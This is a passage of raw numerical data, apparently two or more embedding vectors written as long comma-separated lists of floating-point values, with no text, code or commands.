-0.010158877,0.0049525164,-0.016420212,-0.008951567,-0.06251929,0.0197935,0.15002856,-0.0049809706,0.0050525717,0.025213912,0.0049698544,-0.003935073,-0.1315625,-0.008558269,-0.008471342,0.008293008,-0.027706783,-0.0010643391,-0.01093045,0.012358832,0.017509487,-0.0032139116,-0.0028708652,-0.036661353,0.029968157,-0.014327029,0.009673514,0.009316526,-0.010658678,0.017259207,-0.0138383,-0.0043647736,0.024043389,-0.024598569,-0.012732012,-0.020641802,-0.0019768376,-0.0017412889,0.0014443941,0.012495153,-0.029656222,-0.00709134,0.02627788,0.021354998,-0.03140335,-0.004622139,0.04564092,-0.012081151,-0.026940968,-0.038551815,-0.14066136,0.0045458195,-0.02661429,-0.04841179,0.0013230869,-0.019941142,-0.0021322852,0.009321339,0.013650087,-0.02662455,-0.00204276,0.023629542,-0.014001102,-0.000304661,-0.021224985,-0.031085828,-0.0012480747,-0.018096557,0.0147577785,0.005257587,0.022988005,-0.009192185,-0.00150907,-0.013624595,-0.019560605,0.0092867175,0.0077689616,0.02464542,0.013496085,-0.0016378978,-0.019279283,0.013197838,-0.033561442,0.00033563242,-0.009677116,-0.02122549,-0.0090921605,0.001527952,-0.01705058,0.0094960015,0.011254669,-0.010349887,-0.019318018,0.0044975695,-0.0069926665,0.009178308,0.010898718,-0.017629817,0.008092825,0.008974297,0.006031596,-0.008301821,-0.011977225,0.010210799,-0.019529525,-0.0029591038,-0.009854825,-0.041427907,-0.0041115205,0.0091880625,-0.014699355,-0.007749836,-0.013755702,-0.009452076,0.041611258,-0.0069077206,0.00126646,-0.04908258,0.00052775216,0.013951074,0.0025674254,0.0027241556,0.0074245175,-0.020724593,0.015421955,0.007814308,-0.013971019,0.016250785,0.007430801,-0.026867766,0.047451366,-0.002534956,-0.004993336,-0.028781326,-0.024728958,-0.025020204,0.0029357611,0.007110104,-0.004628419,0.007415836,0.009110857,-0.006274596,0.009596108,-0.01909608,0.033479355,0.0013917421,0.024047311,-0.00398804,-0.03515107,0.0072007,0.008291086,-0.008446266,-0.020536365,-0.0033586693,-0.011708665,0.009073107,-0.009280786,-0.027204819,-0.016381158,-0.0008054814,0.0041265734,-0.007530321,0.027114889,-0.0006026425,-0.018581638,0.006694392,-0.007052102,0.015035742,-0.009793734,-0.010476247,-0.023712866,0.013215626,-0.017345505,-0.012305536,0.020192932,0.011084867,-0.021086555,0.0032108065,-0.010983626,0.009185467,0.008900174,0.0012752145,0.000068148176,0.007518901,-0.010379121,0.007890684,-0.023535771,0.0115864575,-0.022557048,0.0006531108,-0.001975115,0.00081172393,-0.0040069274,-0.0040180013,0.0026015232,-0.010701709,0.03269519,-0.0033353332,0.012714675,-0.0011680521,0.0070911767,0.030861765,-0.019955589,0.015966373,0.026772222,0.05611312,0.0042438637,-0.013858329,0.019701289,0.0115279695,0.0008399904,0.009840224,-0.018438695,-0.015215898,-0.022749497,-0.01649719,0.008451574,-0.012377568,0.01572092,-0.031665135,0.0066357977,0.013938002,0.019513479,-0.0066656186,0.017563043,0.010232773,-0.015555224,-0.004692567,0.026074018,0.017517915,0.00084864814,0.0046858243,0.0029406284,-0.0011400322,0.0015900183,0.0024906038,-0.0038134966,-0.0016804662,0.0022727961,0.017686864,-0.042343557,-0.01137899,-0.021347346,0.007536795,0.00023224688,0.016391775,0.010024822,0.008603268,-0.020350983,0.009492906,-0.01534607,-0.010501253,0.021495385,0.005652736,-0.0037081866,-0.0032459183,0.029897459,0.0024128666,-0.015470971,0.00085050834,-0.027172029,-0.023313656,-0.014416073,0.01631189,-0.009721896,0.008278266,-0.016789867,-0.031040614,-0.01113879,-0.02164515,-0.010522426,0.012919536,0.008084637,0.0152004445,0.01839435,-0.002400874,-0.0036189032,-0.008459828,0.012768357,0.0031488177,-0.010862953,-0.02325524,0.020034261,-0.015970834,0.014664926,0.008376605,0.02432014,0.00354665,-0.0007889008,-0.02554363,-0.024030024,-0.012747277,0.021685097,-0.016632138,-0.017531171,0.008959363,0.009584761,0.030182786,0.0118669225,0.0059221433,0.0049772765,0.020897893,0.005918175,0.017685771,-0.0025544458,0.0055737123,0.01769868,-0.0023941565,-0.0040454012,0.010489526,-0.02482444,0.0016534099,0.023055412,0.0048603495,-0.01053617,0.018778501,-0.00600721,0.01507977,-0.019364372,-0.010307838,0.024680698,-0.016012305,0.0045666373,0.01080965,0.0029797233,-0.012515212,-0.00077526533,-0.015539956,-0.009547029,0.028376183,-0.0059415903,-0.007761429,0.010025736,-0.043792684,0.0119130155,0.011926106,0.014159166,0.033956483,-0.004816715,0.0019616853,0.00469049,0.022327106,0.022673273,0.003204725,-0.0007440034,-0.017617568,-0.0056934347,-0.00044987528,-0.0060174162,-0.00059324736,0.016070418,0.008317513,-0.01543012,-0.016848227,0.019924417,-0.018606717,0.0183711,0.017959742,-0.0077966265,0.013352689,0.010501373,-0.03145085,-0.02706823,-0.029137049,-0.009517971,-0.02678062,0.03663268,0.005237273,-0.022032177,-0.02512413,-0.0009934257,0.039634384,-0.013792427,0.015693406,0.0049779494,0.008526667,-0.014574284,-0.002743944,0.0022148665,0.005989049,-0.008253916,0.006169431,0.021503728,-0.017528666,-0.023989808,0.009846497,0.016817076,-0.0063491934,0.0035189625,0.01745767,0.030005513,0.013155697,0.033812538,-0.024761166,-0.009314096,0.008482218,-0.0045497953,-0.03996948,0.0046157488,-0.03855623,0.00085744134,0.020485412,-0.0010359407,0.003609177,0.0150533235,0.009387049,0.0062235342,-0.010550588,-0.04120178,0.015054114,-0.008007581,0.017277624,-0.017397864,-0.004388744,-0.0013855392,-0.01544556,-0.009137322,-0.024747206,0.023576671,-0.013298657,0.014138885,-0.009435054,0.021503204,0.01127468,-0.040035088,0.00075456285,0.013429115,0.0017994813,0.018156363,0.0055885017,0.017620385,-0.0038034415,0.041158367,-0.026518079,0.00063240883,-0.009667362,0.03207927,0.023791702,0.004216013,-0.0015244645,-0.023267843,-0.023367364,-0.030366559,-0.03907658,0.015406046,-0.003933505,-0.023906173,-0.011260152,0.0057936558,0.0035352432,-0.0028837698,0.009239773,0.027955748,0.006828839,0.020854421,-0.007454619,-0.018904287,-0.036138512,-0.001005275,0.003891481,-0.011269987,-0.007215981,0.0059088143,-0.011088358,-0.032934364,0.00745295,0.0055084648,-0.006164936,-0.015351717,-0.0035322357,0.0070959534,0.004472763,0.025793198,0.01340984,-0.008960968,-0.00072655344,-0.00071619026,0.008891452,-0.00015566732,0.012343131,-0.019442279,0.017397821,0.0022829315,0.008888387,-0.00335446,0.027793719,-0.015150824,0.0058774836,0.014028576,0.00078206183,-0.0018065275,0.010179906,0.013142399,-0.013815885,-0.029700076,-0.017920557,0.04581696,0.005433525,-0.01616363,-0.015400158,-0.0042567807,-0.0071370513,-0.028684152,-0.006199918,-0.0016349336,0.0031495846,-0.019020503,0.005440125,0.028830124,-0.0008847336,-0.007631159,0.026671214,-0.0039622867,0.016887423,-0.0040199924,-0.003075529,0.0012466229,0.02230329,-0.0029795945,0.016834144,-0.025181258,-0.0017110594,0.029705487,-0.009761123,0.004029557,-0.013747235,0.0032084542,-0.014903794,-0.014578111,-0.0010639478,0.016289108,-0.01799047,-0.017658787,-0.024402466,-0.006717893,0.013087056,-0.025645293,0.0072660707,-0.18902393,0.0049909544,-0.018657252,-0.018112656,-0.009638253,-0.009180223,0.023016127,0.019391904,0.012053694,-0.003003126,0.004026379,0.042046946,0.003624119,0.016516913,0.02087055,0.0017657921,-0.022395551,-0.02045537,-0.015554411,-0.010516008,0.0023743128,-0.0021648349,-0.0118788,-0.01502395,0.01640768,0.0023402176,0.001798844,0.02824612,0.0012060812,0.009359152,-0.015864685,0.0073317382,0.011414621,0.0039567263,0.014073634,0.024483692,-0.0066975155,0.0010333868,-0.024685416,0.008670961,-0.004758911,0.0048846346,-0.011149029,0.004023426,0.0138472365,-0.0139816785,0.002553344,0.021358227,0.0153926015,0.016687902,-0.016257433,0.009902279,-0.0017073893,0.00644297,0.009063339,0.012725692,0.00093229156,0.009578534,0.0053848317,0.005035209,-0.018983774,-0.021124698,0.001972574,-0.015162412,0.006581057,-0.010726328,-0.020470593,0.00056013087,-0.0103319045,-0.0074080424,-0.00086478796,0.011768371,-0.0059145247,-0.003578994,-0.009988157,0.01613344,0.012347925,0.0016528881,-0.0037632205,0.033351194,-0.034616053,-0.015068773,-0.0028383431,0.013353793,-0.016190786,0.0024246678,0.009501679,0.012085094,-0.012698274,0.008472772,0.015727594,0.0031185476,-0.0047406256,-0.033440173,-0.001877257,0.011442431,-0.0009413622,0.018938063,-0.016901504,0.004757067,-0.0055901785,0.0036211144,0.017462512,-0.017273063,-0.12472987,-0.0036221049,0.026199045,0.0112819625,0.0030069388,-0.031794086,0.0061214464,-0.003918369,0.037755404,-0.0048672254,-0.0076820687,-0.001272284,0.00014324095,0.0026928347,0.00026802407,0.004603659,-0.02607465,0.011513924,-0.004862958,-0.012866395,0.015606418,-0.0034780018,-0.016490702,0.019433344,-0.007981638,0.0035679133,0.0058139977,0.06593865,0.021431576,0.002442163,-0.0065720947,0.003308886,-0.004913186,-0.014412985,-0.08312903,-0.009986507,0.03657565,0.017113352,0.012868546,0.0107481275,-0.01454895,-0.01757404,0.004570421,0.008015156,-0.00728188,-0.005150218,-0.0008795626,0.016710464,0.0029806616,-0.013655594,-0.0017086245,0.0096937325,0.008759583,-0.009593694,0.02097485,-0.0151639,0.0072484785,0.006170699,0.0053030257,-0.013934471,0.00705039,0.012374771,-0.012930375,-0.0018016178,0.020069703,0.0064659845,-0.008065743,0.010587316,-0.011640179,0.018422803,0.0075201667,0.023322009,0.00632454,-0.013092615,0.020645663,0.017813418,0.030720491,0.029437846,0.018410461,0.003771768,-0.0043928837,-0.001417793,0.0045971526,0.001093257,-0.020055339,0.00900328,-0.003835397,0.0028748587,-0.01944957,0.01073247,0.001661141,-0.012987926,-0.0017464663,0.04160322,0.01590446,0.010175115,0.040223863,0.011063269,-0.019772109,-0.00013065974,-0.008001183,-0.010282517,-0.0071972283,0.022899076,-0.007998497,0.032077998,0.009879125,0.005190928,-0.008553706,-0.0069872704,-0.005297671,0.021406349,-0.0027723983,0.009054538,-0.007846594,0.0035523614,-0.01058916,-0.0012988125,-0.019894153,-0.008680443,0.0031244268,-0.030145427,0.0063682585,-0.01698629,-0.019610714,-0.031488687,-0.004267755,0.033448808,0.014897913,-0.0072951606,-0.003058786,-0.007070428,0.03281558,-0.0002934608,-0.01585963,0.020018196,-0.024801401,0.010559691,0.011282272,-0.00087279733,0.011202506,-0.0035442684,-0.0026360971,-0.014979558,0.0028442084,-0.010682265,-0.0027540252,0.004657927,-0.010793513,-0.0016159014,0.0012607479,0.0035591854,0.0066262716,0.022542981,0.013845653,0.015893215,0.013335239,0.00929348,-0.011340506,0.02229512,-0.024900367,0.028300952,0.035618052,0.00058919395,-0.020621702,-0.00652742,-0.024829756,-0.008826641,-0.009517447,0.0036334745,0.0060254983,0.0020074882,0.011316668,0.017596247,0.004479271,-0.00009082232,0.026643863,0.017245853,0.025915233,0.017106192,-0.023892205,0.0052134367,-0.0038697587,-0.004505415,-0.013102152,0.022912405,-0.0071617677,-0.012902632,-0.011272782,-0.010688669,0.055256054,0.00028152042,-0.0064772265,-0.015396239,-0.004030869,0.0031686,0.006432434,-0.00025515334,-0.0012414458,-0.015020267,-0.01583897,0.004436851,0.01902049,0.012936657,0.018764198,-0.0035621824,0.007153566,0.042134844,-0.0076659485,-0.010945031,-0.02166137,0.0033231196,-0.0028470336,-0.010239444,0.018871475,0.012043002,0.001221878,-0.0266405,0.008416305,0.004727744,-0.016202917,-0.01737108,-0.0076086046,0.020739261,-0.005285524,0.008679496,0.025358941,0.024966696,-0.009906708,-0.008158124,0.018657142,-0.019128237,-0.02309511,-0.017216833,0.020460304,0.019250223,0.018095959,-0.007881979,-0.008774846,-0.0000789568,0.0365683,0.045726303,0.030921165,0.005658405,-0.0013382569,0.007834738,0.008862596,0.0005581119,0.017352223,0.01732171,0.0038957715,-0.0015655922,-0.00924768,-0.006982316,-0.014797854,0.005777968,0.018062681,0.009980904,0.011066475,0.0068007307,-0.007957672,-0.011990781,-0.007464585,-0.021533726,-0.011877852,-0.005658044,0.00077466376,-0.029509196,0.006901815,-0.006320969,0.015258388,0.012009283,-0.0121138515,-0.006304838,-0.02094906,-0.0032382188,0.012098523,0.012574738,0.022819726,0.0027570813,0.0028726135,0.0008550073,-0.009376934,0.02172716,0.02275952,0.00858742,0.022184934,0.00011303214,-0.01763905,-0.0026224086,0.008377709,0.00845291,-0.015560564,-0.0058253068,0.0011241137,0.017692639,0.0144810565,-0.004806823,0.0033488995,0.008163539,0.025658447,-0.008917823,-0.0039089154,-0.004180852,0.0020485818,0.011613763,0.004378041,0.018314732,0.015829416,-0.013535172,0.0038167764,0.013448469,-0.01723566,0.023302121,0.009578429,0.011949655,-0.009855156,0.00071817957,-0.04399946,-0.023538586,-0.013081384,-0.0026919185,0.026219748,-0.023282673,0.019912664,-0.0077895042,-0.0037267325,0.017847346,-0.032555707,-0.005958412,0.027986357,-0.08123834,-0.008583924,-0.0066268058,0.020885514,-0.009587991,0.014878711,0.023351898,-0.0079489825,0.010006316,-0.003617058,0.0069295918,0.009788053,-0.0066025946,-0.00018107786,0.018561766,0.004569676,-0.008041131,-0.016186813,0.009262342,-0.003847994,-0.0028739742,-0.0039023268,-0.005716459,-0.020435117,0.017312316,-0.03351043,-0.0044561657,0.0037223296,0.0065717446,-0.018714337,-0.0019287281,-0.0044098324,-0.01486046,-0.00009295711,-0.007558732,-0.017044576,0.006409284,0.01890253,0.015239493,-0.0065760524,0.014113135,-0.03499511,-0.02289501,-0.0026959523,-0.09253526,0.011831728,-0.0020978367,0.005423682,0.019294873,-0.0053416113,-0.0070531834,0.0062860837,0.023941224,0.023411376,-0.0077172355,0.0018031921,-0.019370465,-0.02394733,0.01913335,-0.0019888396,-0.009192054,0.037120838,-0.016271228,-0.015466139,-0.0043871934,-0.009887219,-0.009457308,-0.014036402,0.03200152,-0.008265175,-0.0071991393,-0.010568569,0.034476165,-0.014095867,-0.012937416,-0.0027261795,-0.010115987,0.0008945247,0.008410178,-0.0052841385,-0.0128348945,0.019649992,-0.008809762,-0.013624575,-0.018109394,0.010707648,0.0037658536,0.015347018,-0.014883524,-0.008576202,-0.021893889,0.012848596,-0.013701678,-0.011116797,-0.027752353,0.015339206,-0.004181053,0.00012440543,0.0070838737,0.018345747,0.0016487996,-0.01994995,0.025754876,0.009331243,-0.016693914,-0.0024538639,0.0065241256,0.0033890563,-0.012160993,0.0077471742,-0.0030528812,0.010598903,-0.0031746805,-0.0067347325,-0.008459738,-0.02290891,-0.02300429,-0.016328733,-0.012785045,0.017408606,0.0075279716,-0.02689857,-0.017355716,0.00015876954,0.05533925,-0.009215595,0.012733544,0.017234491,0.009323509,-0.0007494799,-0.024880905,0.0025791205,0.04437951,0.0125092175,-0.013032791,-0.012869358,0.02731465,0.026619177,0.011348459,0.025188638,-0.016050521,0.0045157317,0.014563726,-0.013295018,0.0064482884,-0.0025712156,-0.010135053,-0.01255657,-0.018891549,0.001391175,-0.010198201,-0.006287103,0.0013336837,-0.009316662,0.011198566,0.017451053,0.024550365,0.0389927,0.009825359,0.011867676,-0.004464193,0.030609792,-0.019292574,-0.0044003297,-0.010056828,-0.008113687,-0.007969349,0.025746034,-0.00016177294,-0.008317132,0.0020375904,0.004678783,-0.019875895,0.0013913284,-0.0016301639,0.021548662,0.028191607,0.02541242,0.0030057407,0.017439872,-0.0051164827,0.010763293,0.0031256222,0.036712065,-0.01411526,-0.029229203,0.01742205,-0.010880387,-0.0057123313,0.02903166,0.0007194071,-0.0018561673,0.014190151,-0.0039063613,-0.0016573867,-0.000021335918,0.016530374,-0.0020838662,0.008217563,-0.01718521,-0.0043712524,-0.005694108,-0.03370566,-0.007048603,0.0056668725,-0.014092563,0.027398743,-0.0069916556,-0.027959269,0.016812842,0.00040268374,-0.01394878,-0.00090586656,-0.017170357,-0.014821319,0.00022976933,0.010735382,-0.013663363,-0.016085919,-0.021061875,0.02967105,0.018308502,-0.015044384,-0.0022563974,0.0023691559,0.0037258724,-0.005702373,-0.0043908833,0.0035778699,-0.008080715,0.018015103,0.011241617,0.004890534,-0.003328568,0.006360212,0.012106947,-0.024160063,-0.008166621,-0.010208129,0.0005642406,0.013427087,0.007157039,0.006029529,0.020097204,-0.019876365,0.010666611,-0.022776203,0.0046976604,0.04830695,0.01932435,-0.0000139998565,0.0007760323,-0.018439166,0.021761408,-0.010959342,0.01036897,0.021377034,0.100436926,0.014810718,-0.002962604,-0.010369664,0.013822967,0.008581437,0.023179036,-0.0050044567,0.010428648,-0.0067275786,0.015734347,-0.013139146,0.012424159,-0.006332523,-0.0049793688,0.01805375,0.01675393,-0.022169773,0.010311598,-0.008161882,0.0020954588,-0.021500846,-0.012740109,-0.037372403,-0.028391263,-0.042517412,0.039545137,0.008146766,-0.002577831,0.0487927,0.007632043,-0.001573033,-0.009114786,0.00311406,-0.016623003,0.0039338227,0.009743203,-0.018429779,0.00054001936,-0.018191144,0.013745167,0.005877933,0.00963266,-0.018241005,-0.005437675,-0.010532711,0.0031888215,-0.0141803725,-0.000009245187,-0.017341876,-0.0031979573,0.011166108,-0.004413681,-0.016070416,-0.005535054,-0.016447144,0.013052841,0.028604513,0.016011368,0.0018033592,0.0016625423,0.0014142941,0.0053720647,-0.023126386,0.02449477,-0.0036938468,-0.019752234,-0.01171976,-0.005279419,-0.005185589,0.009471889,-0.01392678,-0.0008997893,0.009183535,0.0003938922,0.011818178,-0.004913487,-0.00701286,0.014026773,-0.021707615,0.007413122,-0.00578531,0.001616359,0.008883736,0.007985892,0.015279574,-0.0071321083,-0.0052297167,-0.0020283242,-0.004169186,-0.0037356557,0.014225289,0.030983763,0.0047446825,0.001128411,-0.008819553,0.029214524,0.024156895,-0.01697411,-0.038045723,-0.01895858,-0.004985231,0.0042804447,0.0048214616,0.0030041153,-0.007871524,0.01037158,-0.00953019,-0.019538665,0.0019577134,-0.0034575248,0.031971443,-0.015532513,0.020802656,-0.007506706,0.016195705,-0.013530758,0.0002789219,0.011771958,-0.008488954,-0.0115572335,0.013101027,0.009879648,0.02423115,0.018952575,0.0042125117,-0.010402435,0.020273589,0.004879897,0.005724236,0.007522357,-0.026310151,-0.006899537,0.013118865,-0.015679428,-0.0071503795,0.02881115,0.011074685,0.027093686,-0.00065724767,0.020722214,-0.015607424,-0.010018811,-0.020553537,0.002469447,-0.023157181,0.025283858,-0.015731508,0.010549042,-0.010191377,-0.0031885523,0.017611697,-0.013717149,-0.0028274336,-0.017748939,-0.002892515,-0.026089264,-0.005131754,0.0014610487,-0.015558129,0.035835415,-0.007162589,0.0067095463,-0.05187859,0.028238365,0.008026533,0.020534787,0.0034356876,0.0021850162,-0.011421462,-0.0008485711,0.004820159,0.0033191019,-0.0011319893,-0.014557137,0.014557346,0.014835276,0.018240947,-0.02430151,0.0020585146,0.015920917,0.007514386,-0.015650049,0.0070951614,0.041471515,-0.0037960124,0.0027466782,0.0028324146,-0.008549733,0.03581593,0.0010381725,0.008760544,-0.0050723418,0.0004928572,-0.020673413,0.01118381,-0.043611012,0.054221734,-0.00979954,-0.035378184,0.01632687,-0.0044144373,0.010056704,-0.014799441,0.014853495,0.0046596513,0.014241513,0.0028939329,-0.0025700803,-0.021176528,0.02360091,-0.011369372,0.00839895,-0.024212433,-0.011963158,0.0032419423,0.0010594985,-0.021652317,-0.017474553,-0.00050612295,0.0152732,0.016777435,-0.0077292346,-0.006473358,-0.0028705206,-0.0006920434,-0.003911265,-0.018420687,0.018463818,-0.023428926,-0.036603093,0.007528955,-0.003332049,0.010397312,0.0091239335,-0.0012420495,0.015902383,0.019354334,0.0082052555,-0.00025772493,-0.010222141,0.010110006,0.021364886,0.0007988311,-0.022409018,0.0042999443,0.008468869,-0.000047315625,0.0070347725,-0.013495033,-0.009685846,-0.012451231,-0.03244755,-0.0054951794,-0.009797432,-0.025079994,0.016320588,0.019452017,0.0121251475,0.00129145,0.016875539,0.037416916,-0.0136002675,0.0044405386,0.0010460461,0.004890123,-0.010226126,-0.006158954,0.008213617,0.017160295,-0.005460989,-0.0026147258,-0.011323804,0.020982495,0.014796208,-0.003002781,0.0032019245,0.005487053,-0.0040960577,-0.018518971,0.025092613,-0.0206365,0.0027091606,-0.026304446,-0.011363195,-0.00534315,-0.002952413,0.01681141,0.055444762,-0.05774891,-0.006793957,0.011794824,0.00081022613,-0.045615472,0.021550883,0.00510476,-0.036537286,-0.028793288,0.0046920707,-0.01565283,-0.01320202,-0.03317776,0.016818816,0.015750667,-0.014700182,-0.009096405,0.023062555,-0.011656554,-0.01876336,0.041671623,-0.008828085,-0.00093705894,-0.0042685037,-0.020492474,-0.00026263602,0.014288964,-0.0009916,0.0038159804,0.025669158,0.005590938,0.020583628,-0.009760573,-0.00008646549,-0.0021795707,-0.0043386677,0.015926898,0.006743501,-0.024669241,-0.036341343,-0.0040082424,-0.012029807,-0.0036575377,0.023060914,-0.0019580147,-0.0335087,0.036325544,-0.010727061,0.09726048,-0.019223552,0.006662247,0.00039088912,-0.007830608,-0.012101988,-0.004166671,0.024978297,0.0053974665,0.009461248,0.0069221333,-0.0041408627,0.007109965,0.030186359,-0.0012903678,-0.005657125,0.02096884,0.09919264,-0.015853414,0.024091609,0.024386454,0.013857962,-0.0053332397,0.011925511,-0.00077638734,-0.064187795,-0.0024956318,-0.022074655,0.009191705,0.0045273867,-0.022456877,0.01155781,0.008734079,0.004136312,-0.019001028,0.02818967,0.007269313,-0.013609512,-0.031156303,-0.010229431,0.0026728672,0.006942451,-0.0013384226,0.013479919,-0.021620896,0.017609723,-0.027065605,0.02386509,-0.01635123,-0.00010730888,-0.003528037,-0.010748821,0.02141182,-0.0063120467,-0.016457899,-0.013618696,0.010899915,0.0068098027,-0.019297056,0.009883331,-0.0057075233,0.005038781,0.006804566,0.023952153,0.0013507647,-0.010170673,-0.000490072,0.0064339424,-0.010402099,0.010013661,0.02081862,0.040753603,-0.022996018,0.007581064,0.005536429,0.012212056,-0.00287855,-0.004751957,0.014025826,0.0036523703,0.035114206,-0.0017668768,-0.002693578,-0.002322742,-0.0053452873,0.01884101,0.0014507156,0.006279486,0.008544129,-0.018100832,-0.013725344,0.0031902473,-0.014157953,-0.0037781335,0.021066692,0.0099788895,0.004059277,-0.008544835,0.004364691,-0.0264964,0.0039002656,0.028213577,-0.019317674,-0.00995381,0.0056480877,0.002481655,-0.010615957,-0.012997926,0.0032067304,0.0041597616,0.016872104,0.009172166,-0.005831162,0.014758574,-0.012129729,-0.017163148,-0.01324289,0.016252182,-0.010141725,-0.0068545253,0.014307899,-0.01220236,-0.000080200065,0.01682731,-0.02494299,0.0019314968,0.01476114,0.0063569527,-0.0013844129,-0.010372203,-0.009468297,0.0024502634,0.011526676,0.028152652,0.013838092,-0.03489119,0.013469853,-0.01064507,-0.019676121,-0.014278527,0.020662906,-0.002165955,0.0056356,0.0072625894,-0.012407389,-0.01716982,-0.0016206625,-0.008420779],[-0.01175018,-0.0013353323,-0.02128115,-0.026611824,-0.0047053876,-0.021156866,-0.000032790707,0.01690541,-0.0044307313,-0.0050439676,-0.005772751,0.026542652,0.0009362289,-0.005314829,-0.011305161,-0.011840591,0.014609863,0.0039026733,-0.003737422,-0.004363569,0.008839962,-0.006502853,0.024443673,-0.0045648864,0.010888739,0.015677797,0.010448254,0.0061754016,0.00629407,0.012931704,-0.0071089747,0.02469986,0.016312856,-0.01358363,0.014928914,-0.0038667554,-0.026620157,-0.003937852,0.0035710544,-0.008273253,-0.016721128,0.015494573,-0.005664612,0.039729793,-0.018275324,-0.01355121,0.0011401416,0.026670469,-0.01106807,0.0012450862,0.0038756307,-0.0050029852,-0.018442981,0.0134152975,0.006758824,0.024636112,-0.015161086,-0.023973852,-0.0019875993,-0.0026236775,-0.011679052,0.0015147073,-0.006657259,-0.016275043,0.038011044,0.004454608,0.013737208,0.006781235,-0.003295542,-0.024376554,-0.006705398,-0.008415278,0.0074896566,0.00047367005,0.0254611,0.016304743,-0.0062515214,-0.019621942,-0.0072361995,0.016966516,-0.016941108,-0.003956415,-0.0017399555,0.007232196,0.0042167823,-0.0066991234,-0.010532622,-0.0036471488,-0.018520674,-0.017178912,-0.0048531024,0.00045638686,0.001133277,0.013897945,-0.024804242,0.0010461374,0.006097144,0.000027201388,-0.007741402,-0.00090631493,0.0004483504,-0.012610652,-0.028465012,0.009113057,0.015956374,-0.027027711,0.008163588,-0.015986348,0.0062448876,-0.014529398,-0.005909898,-0.0034021477,0.001862835,0.0031488277,-0.0006697747,-0.0021105995,0.015844157,0.007845164,-0.0025099379,-0.0075947004,-0.023282818,0.05026768,-0.0020058064,-0.0035033033,-0.00085863506,-0.0032827253,0.0073331497,0.0074659544,-0.00026071383,-0.0076721734,-0.0076068225,0.01479193,-0.002856605,-0.0063877287,-0.0028106314,-0.0043749427,0.008782512,-0.009942981,-0.006973456,-0.019788483,0.013834745,-0.010630749,0.008381385,0.0024617976,0.016551802,0.014836744,-0.0069999998,0.017292457,0.01831316,-0.014289288,0.009345206,-0.003004915,-0.01713106,-0.02191896,-0.0019923502,0.034115694,0.0027558464,-0.017069584,-0.029727815,-0.0013663241,-0.0036774045,0.0016094737,-0.004927074,-0.0034826768,-0.029299762,-0.01923003,0.007892063,-0.0069475607,-0.01544528,0.014782981,0.02558492,0.026860027,0.016245537,0.009370426,0.012413174,0.033217248,0.004270035,-0.029203748,0.0052378075,-0.0014064742,0.0051972857,0.0121335825,-0.0093460465,0.008686722,0.0059656696,0.025583187,0.0109546,-0.015708154,-0.016982693,-0.022003355,0.0018569734,-0.013362303,-0.00883554,0.0070452285,-0.0121955285,-0.022791132,-0.014618704,0.09869599,-0.014637098,0.009284511,-0.020335846,0.02213499,0.009283344,-0.016315738,-0.013025928,-0.015625212,-0.015878426,-0.017484868,0.018394813,-0.0020686965,0.0032984866,-0.0054226653,-0.010228896,0.0071689114,0.0030801573,-0.06699684,0.0095945755,0.008442971,0.010810191,0.0028977052,-0.0005759238,0.0035793714,-0.00081995904,-0.030681174,-0.019244872,-0.02100977,0.000881043,-0.005574065,0.0050841314,-0.029065013,-0.006510396,0.025725422,-0.02925793,-0.019008173,-0.0014461724,-0.009046425,0.013225511,-0.019748358,0.00028326226,-0.00068553985,-0.0041956874,0.0054385266,0.0066731926,0.031054666,-0.010700379,0.02244306,0.031140836,0.0045862375,-0.0127647845,0.0095831035,0.023652477,-0.012682051,0.008181701,0.022638133,-0.0073485128,-0.015300169,0.010426203,-0.013757228,0.0021383155,0.014961012,0.022769231,0.019563507,-0.0210804,0.026306853,0.037100606,0.005151729,0.02263467,-0.04324027,-0.018615149,-0.0071691843,-0.03347143,0.013027394,0.0019721154,0.0037229578,-0.0064758225,-0.0072681536,-0.0071182214,-0.007439885,0.004850047,-0.009310506,0.0013011245,-0.004106011,-0.0043902127,-0.023437975,-0.015661819,0.007988132,-0.0051131276,0.012328685,0.031636853,-0.005442899,-0.00798146,0.002516584,0.0053778896,0.004236762,-0.016922832,-0.014617487,-0.020107986,0.020662516,0.006415473,-0.01713627,-0.0037436252,-0.015260313,0.024234036,-0.018591287,-0.013219247,-0.0053321617,-0.0016846964,0.043608055,-0.005218255,0.0068278965,-0.020355618,-0.014518639,-0.026100785,-0.0067097475,-0.008757005,0.0061711078,0.0029399428,-0.010473909,-0.0093121175,-0.010475736,0.020708254,-0.019090807,0.0071350117,-0.04418701,-0.0072895354,0.009176107,0.006336443,-0.00013957385,0.025928231,0.008246007,-0.019110216,0.004920607,0.030141732,0.024606783,-0.009378913,0.018002115,-0.013645429,0.02132553,0.008101282,0.00023057751,-0.023301715,-0.010832994,-0.02005058,0.006847737,-0.002459899,-0.010184254,-0.00134529,0.004232336,0.018691918,0.00737572,0.029628156,-0.0069517656,0.001976126,0.0061492724,-0.0068084886,-0.00031042148,0.0072666453,-0.004650995,-0.0063135484,-0.012342029,0.041174646,-0.006335882,-0.011613445,0.009388354,0.07712551,-0.004077794,0.00014460842,0.009282682,-0.012941364,-0.005971156,0.017905952,0.024242593,-0.008238674,-0.0009034935,-0.013416386,-0.025010409,-0.0022223012,0.006350375,-0.027460348,0.026681535,-0.016835274,-0.020936579,-0.030725867,-0.018545385,0.02729185,-0.018575108,0.01269652,0.016408626,0.011296684,0.017313253,0.01592997,-0.0050952407,-0.0022433351,-0.025605978,-0.012593889,-0.0046815546,0.0038234883,0.008038054,-0.039942708,0.017989203,0.016328774,0.013933359,-0.00005729464,-0.014992277,0.008056416,0.014933143,0.005581922,-0.011131763,-0.0039466578,0.037670825,-0.019648725,0.009031309,-0.0009232957,0.015641851,0.013423293,0.014852832,-0.018741136,0.0043705096,0.013670979,0.013979298,0.008165555,-0.035205476,0.04302819,0.03171231,0.015708504,0.02736627,0.0020268091,0.0012363028,0.0038692579,0.027138533,-0.014878081,-0.014212769,-0.0004959473,-0.013809033,0.0030485466,0.019248107,-0.0141656315,0.01957274,-0.009718761,0.011465208,-0.016637677,-0.010824896,0.015807353,0.029835265,-0.009613206,0.0038031456,-0.003913599,-0.004725848,-0.00524172,0.001449999,0.0025684088,0.010480409,0.014175589,-0.009781262,-0.012277712,0.0065560495,0.0060799527,0.006125249,0.031205066,0.029366866,0.007052948,0.022935968,0.0031285144,0.0031820203,0.0028110286,-0.0014841986,0.0019150655,-0.012410705,0.004012156,-0.00426243,0.0063231247,-0.0026977672,0.0067218845,0.03329169,-0.018856088,0.008494252,-0.0020370455,-0.002818749,0.015613958,-0.027279388,-0.009936395,-0.013939977,-0.015607119,0.0036422517,0.01657933,0.008569028,0.010042225,0.019290566,0.021780543,0.0056480155,-0.00089897146,-0.0051792627,0.010167489,0.019675896,-0.00029007482,0.037287343,0.01